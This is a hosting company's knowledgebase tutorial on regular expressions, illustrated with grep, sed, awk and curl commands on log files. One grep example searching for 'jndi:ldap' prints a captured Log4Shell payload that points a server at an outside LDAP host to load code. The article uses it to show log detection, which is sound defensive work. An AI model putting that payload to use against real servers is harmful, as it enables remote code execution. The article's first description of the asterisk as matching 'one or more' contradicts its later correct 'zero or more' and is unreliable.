Regular expressions

Call Us 0800 107 7979

Service Status

Back to knowledgebase

17 December 2021

A regular expression, or regex, is a sequence of characters that represents a pattern. They are commonly used in code and text processing. For instance, you can use a regex to validate user input or to filter specific data from a log file.

Regular expressions should not be confused with globbing. A glob is also a sequence of characters that represents a pattern, but it is used only for file name expansion on the command line. As a simple example of globbing, you can list all PHP files in a directory with the command ls *.php. The glob in the command is the asterisk – it matches zero or more characters. In a regex the asterisk matches one or more instances of the preceding character. There a few differences like this, and it is easy to get them muddled up.

Another thing to be aware of is there are two types of regular expressions: basic (BRE) and extended (ERE). As the names suggest, extended regular expressions have a few extra options. Utilities such as grep and sed use basic regular expressions by default. However, with both you can use the -E option to enable extended regular expressions.

Basic regular expresssions

Anchor characters

The caret (^) and dollar sign ($) denote the start and end of a string. You can use the caret to get lines in a file that start with a certain string, such as a date or IP address:

# grep ^1.2.3.4 /var/log/httpd/example.log
1.2.3.4 - - [14/Dec/2021:04:55:27 +0000] "GET /wp-login.php HTTP/1.1" 403 247 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...

Or, on a RHEL-based system you can count the number of AMD64 packages by looking at the end of the package names. Here, I list all packages on my system and then pipe the output to a grep command that counts the number of lines that end with the string “x86_64”:

# rpm -qa | grep -c x86_64$
541

And you can also use both anchors. For instance, this is a quick way to delete empty lines using sed. The command matches any lines in the file data that start and end with nothing (i.e. there is nothing between the caret and dollar sign):

$ sed '/^$/d' data

The dot and asterisk

A dot matches any character. For instance, here I look for lines in a log file where the first field matches the pattern “^2021-12-1.$”:

# awk '$1 ~ /^2021-12-1.$/ {print $0}' /var/log/fail2ban.log
2021-12-10 00:00:06,495 fail2ban.filter         [862]: INFO    [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06
2021-12-10 00:01:43,818 fail2ban.filter         [862]: INFO    [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43
...
2021-12-15 16:23:10,577 fail2ban.filter         [862]: INFO    [sshd] Found 34.118.67.208 -  2021-12-15 16:23:10

If you are an eagle-eyed reader then you might have noticed that the regex is more or less redundant. The pattern “2021-12-1” would return the same set of results. The difference is that the pattern “^2021-12-1.$” makes sure that you only match lines that start with “2021-12-1” plus a single character. It would ignore any malformed date fields.

The dot is often used in combination with the asterisk, which is a quantifier that matches the preceding character zero or more times. You can use this to grep multiple strings on a single line. For instance, here, I look for lines containing the strings “14/Dec” and “jndi:ldap” (with anything inbetween the two patterns):

# grep "14/Dec.*jndi:ldap" /var/log/httpd/example.log
112.74.52.90 - - [14/Dec/2021:11:40:06 +0000] "GET / HTTP/1.1" 200 4917 "-" "/${jndi:ldap://45.83.193.150:1389/Exploit}"

Character ranges

A minute ago I argued that the pattern “^2021-12-1.$” is slightly better than “2021-12-1”. As things stand, though, the pattern would match a string like “2021-12-1x”. That is a problem, as our aim is to match (valid) dates.

We can further improve the pattern by making sure that the last character is digit. To do so, you can use a range:

# awk '$1 ~ /^2021-12-1[0-9]$/ {print $0}' /var/log/fail2ban.log
2021-12-10 00:00:06,495 fail2ban.filter         [862]: INFO    [sshd] Found 221.131.165.62 - 2021-12-10 00:00:06
2021-12-10 00:01:43,818 fail2ban.filter         [862]: INFO    [sshd] Found 209.141.34.220 - 2021-12-10 00:01:43
...
2021-12-15 16:23:10,577 fail2ban.filter         [862]: INFO    [sshd] Found 34.118.67.208 -  2021-12-15 16:23:10

A range is defined in square brackets. In the above example I used “[0-9]”, which matches any digit in the range 0 to 9. You can do the same with letters. For instance, “[a-z]” matches all letters of the alphabet. It is worth pointing out that the latter pattern is case-sensitive. To match all letters of the alphabet in either lower or upper case you can use “[a-zA-Z]”. And to match any alphanumeric character you can use “[a-zA-Z0-9]”.

You can also specify specific characters rather than a range. For instance, if you have a script that needs to check if a user answered “y” or “Y” to a question then you use “[yY]”.

Negating ranges

You can also do that reverse. If you want to make sure a string doesn’t match any digits then you can put a caret at the start of the range. So, “[^0-9]” matches everything but digits. Notice that the meaning of the caret symbol is now wildly different from its earlier meaning. Outside ranges the caret denotes the start of a string.

Special character classes

There are a few special character classes you can use instead of ranges such as “[a-z]”. These classes use a pair of double square brackets, and the type of class is defined inside a pair of colons.

Class	Matches	Equivalent
`[[:alpha:]]`	Alphabetical characters	`[a-zA-Z]`
`[[:alnum:]]`	Alphabetical characters and integers	`[a-zA-Z0-9]`
`[[:blank:]]`	Space or tab characters	`[ \t]`
`[[:digit:]]`	Integers	`[0-9]`
`[[:lower:]]`	Lower case alphabetical characters	`[a-z]`
`[[:upper:]]`	Upper case alphabetical characters	`[A-Z]`

Extended regular expressions

Extended regular expressions bring a few more meta characters to the party. As mentioned, you need to use the -E option if you want to use ERE in grep and sed.

The question mark

Like the asterisk, the question mark is a quantifier. But, whereas the asterisk matches the preceding character zero or more times, the question mark matches the preceding character zero or one time. To illustrate, if you want to check if a user entered “y”, “Y”, “yes” or “YES” then you can use the pattern “^[yY][eE]?[sS]?$”:

$ echo 'y' | grep -E "^[yY][eE]?[sS]?$"
y

$ echo 'YES' | grep -E "^[yY][eE]?[sS]?$"
YES

$ echo 'YES!' | grep -E "^[yY][eE]?[sS]?$"

Notice that the string “YES!” does not match. The reason is that I used the dollar sign to mark where the string ends.

Curly braces

Curly braces ({ and }) let you specify how many times the preceding element can appear. For instance, let’s say you want to check if a string uses the format YYYY-MM-DD. You can do that with the following pattern:

$ echo '2021-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^[[:digit:]]{4}-[[:digit:]]{2}-[[:digit:]]{2}$"

The second test failed because the string “21-12-15” doesn’t start with four digits. If you want to allow either two or four digits then you can use this pattern instead:

$ echo '2021-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^[[:digit:]]{2,4}-[[:digit:]]{2}-[[:digit:]]{2}$"
21-12-15

Grouping expressions

An alternative way to validate the strings “2021-12-15” and “21-12-15” is to use grouping expressions. You can group a pattern using parentheses, and you can combine an expression with meta characters. So, you can use “(20)?” if the string may or may not start with “20”:

$ echo '2021-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$"
2021-12-15

$ echo '21-12-15' | grep -E "^(20)?21-[[:digit:]]{2}-[[:digit:]]{2}$"
21-12-15

Pipes

The pipe symbol (|) functions as an OR operator. In other words, it let’s you match one of mulitple patterns. This can be handy to grep lines that contain one of mulitple strings.

For instance, if you want to check if a website redirects correctly you can use a simple cURL command. That works, but the output contains lots of other information:

$ curl -IL catalyst2.com
HTTP/1.1 301 Moved Permanently
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
date: Tue, 14 Dec 2021 15:04:41 GMT
location: https://catalyst2.com/
x-frame-options: SAMEORIGIN

HTTP/2 301 
content-type: text/html; charset=UTF-8
strict-transport-security: max-age=10886400
expires: Mon, 13 Dec 2021 14:11:46 GMT
cache-control: max-age=3600
x-redirect-by: WordPress
location: https://www.catalyst2.com/
x-litespeed-cache: hit
date: Tue, 14 Dec 2021 15:04:41 GMT
x-frame-options: SAMEORIGIN
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

HTTP/2 200 
content-type: text/html; charset=UTF-8
strict-transport-security: max-age=10886400
link: <https://www.catalyst2.com/wp-json/>; rel="https://api.w.org/"
link: <https://www.catalyst2.com/wp-json/wp/v2/pages/5>; rel="alternate"; type="application/json"
link: <https://www.catalyst2.com/>; rel=shortlink
etag: "24284-1639400931;;;"
x-litespeed-cache: hit
date: Tue, 14 Dec 2021 15:04:41 GMT
x-frame-options: SAMEORIGIN
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

To get just the information you are interested in you can grep lines that start with either “HTTP” or “Location”:

$ curl --silent -IL catalyst2.com | grep -Ei ^"http|location"
HTTP/1.1 301 Moved Permanently
location: https://catalyst2.com/
HTTP/2 301 
location: https://www.catalyst2.com/
HTTP/2 200

Featured Blogs

Best Practices for Backing Up Dedicated Server Data

What our clients say

We really rate catalyst2. We get a great response from the team… really happy with the service.

Mike Fieldhouse, realityhouse

Privacy Overview

This website uses cookies to improve your experience while you navigate through the website. Out of these cookies, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may have an effect on your browsing experience.

Necessary

Always Enabled

Functional

Functional cookies help to perform certain functionalities like sharing the content of the website on social media platforms, collect feedbacks, and other third-party features.

Cookie	Duration	Description
bcookie	2 years	LinkedIn sets this cookie from LinkedIn share buttons and ad tags to recognize browser ID.
bscookie	2 years	LinkedIn sets this cookie to store performed actions on the website.
lang	session	LinkedIn sets this cookie to remember a user's language setting.
lidc	1 day	LinkedIn sets the lidc cookie to facilitate data center selection.
UserMatchHistory	1 month	LinkedIn sets this cookie for LinkedIn Ads ID syncing.

Performance

Analytics

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics the number of visitors, bounce rate, traffic source, etc.

Cookie	Duration	Description
_ga	2 years	The _ga cookie, installed by Google Analytics, calculates visitor, session and campaign data and also keeps track of site usage for the site's analytics report. The cookie stores information anonymously and assigns a randomly generated number to recognize unique visitors.
_gat_gtag_UA_5562310_11	1 minute	Set by Google to distinguish users.
_gid	1 day	Installed by Google Analytics, _gid cookie stores information on how visitors use a website, while also creating an analytics report of the website's performance. Some of the data that are collected include the number of visitors, their source, and the pages they visit anonymously.
CONSENT	2 years	YouTube sets this cookie via embedded youtube-videos and registers anonymous statistical data.

Advertisement cookies are used to provide visitors with relevant ads and marketing campaigns. These cookies track visitors across websites and collect information to provide customized ads.

Cookie	Duration	Description
_fbp	3 months	This cookie is set by Facebook to display advertisements when either on Facebook or on a digital platform powered by Facebook advertising, after visiting the website.
fr	3 months	Facebook sets this cookie to show relevant advertisements to users by tracking user behaviour across the web, on sites that have Facebook pixel or Facebook social plugin.
IDE	1 year 24 days	Google DoubleClick IDE cookies are used to store information about how the user uses the website to present them with relevant ads and according to the user profile.
test_cookie	15 minutes	The test_cookie is set by doubleclick.net and is used to determine if the user's browser supports cookies.
VISITOR_INFO1_LIVE	5 months 27 days	A cookie set by YouTube to measure bandwidth that determines whether the user gets the new or old player interface.
YSC	session	YSC cookie is set by Youtube and is used to track the views of embedded videos on Youtube pages.
yt-remote-connected-devices	never	YouTube sets this cookie to store the video preferences of the user using embedded YouTube video.
yt-remote-device-id	never	YouTube sets this cookie to store the video preferences of the user using embedded YouTube video.

Others

Other uncategorized cookies are those that are being analyzed and have not been classified into a category as yet.

Cookie	Duration	Description
_ashkii	session	No description available.
_wicasa	3 months	No description available.
AnalyticsSyncHistory	1 month	No description
cookid	3 months	No description available.
cookietest	session	No description
crisp-client/domain-detect/1644827320973	session	No description
crisp-client/domain-detect/1644827348275	session	No description
crisp-client/domain-detect/1644827428415	session	No description
crisp-client/domain-detect/1644827479357	session	No description
crisp-client/domain-detect/1644827596454	session	No description
crisp-client/domain-detect/1644827724838	session	No description
crisp-client/domain-detect/1644827824383	session	No description
crisp-client/domain-detect/1644827878659	session	No description
crisp-client/domain-detect/1644828716243	session	No description
crisp-client/domain-detect/1644828846246	session	No description
crisp-client/domain-detect/1644829369013	session	No description
crisp-clientsession30cc6953-ebcf-4bc6-b649-c44eb446409e	6 months	No description
dbmFP	3 months	No description available.
dbmPK	3 months	No description available.
li_gc	2 years	No description